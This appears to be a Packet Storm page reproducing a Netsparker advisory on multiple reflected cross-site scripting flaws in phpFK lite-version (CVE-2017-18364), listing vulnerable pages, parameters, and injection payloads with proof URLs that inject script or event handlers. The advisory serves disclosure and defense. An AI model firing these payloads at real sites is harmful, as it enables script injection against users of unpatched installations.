what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpFK lite-version Cross Site Scripting

phpFK lite-version Cross Site Scripting
Posted Jul 10, 2019
Authored by Daniel Bishtawi | Site netsparker.com

phpFK lite-version suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2017-18364
SHA-256 | bfadb994d6bd3b1cd2775392aa603af686c5d2de5375e627da22472373722c76

phpFK lite-version Cross Site Scripting

Change Mirror Download
*Information:*

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in phpFK
Affected Software: phpFK
Affected Versions: lite-version
Homepage: https://www.frank-karau.de/
Vulnerability: Reflected Cross-site Scripting
Severity: 7.4 High
Status: Not Fixed
CVSS Score (3.0): CVE-2017-18364
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-006

*Technical Details:*

/faq.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00164F)</scRipt>
Proof URL : http://
{domain}/faq.php?'"--></style></scRipt><scRipt>alert(0x00164F)</scRipt>

/members.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00158E)</scRipt>
Proof URL : http://
{domain}/members.php?'"--></style></scRipt><scRipt>alert(0x00158E)</scRipt>

/members.php (search (GET))

Parameter Name : search
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x0069A0)+x%3d%22
Proof URL : http://
{domain}/members.php?search=x"%20onmouseover=netsparker(0x0069A0)%20x="&sort=username

/members.php (search (POST))

Parameter Name : search
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x006EBA)+x%3d%22

/search.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern : '"--></style></scRipt><scRipt>netsparker(0x00171D)</scRipt>
Proof URL : http://
{domain}/search.php?'"--></style></scRipt><scRipt>alert(0x00171D)</scRipt>

/user.php (user (GET))

Parameter Name : user
Parameter Type : GET
Attack Pattern :
%3c%2ftitle%3e%3cscRipt%3enetsparker(0x001122)%3c%2fscRipt%3e
Proof URL : http://
{domain}/user.php?user=</title><scRipt>netsparker(0x001122)</scRipt>

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-006-reflected-cross-site-scripting-in-phpfk/

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close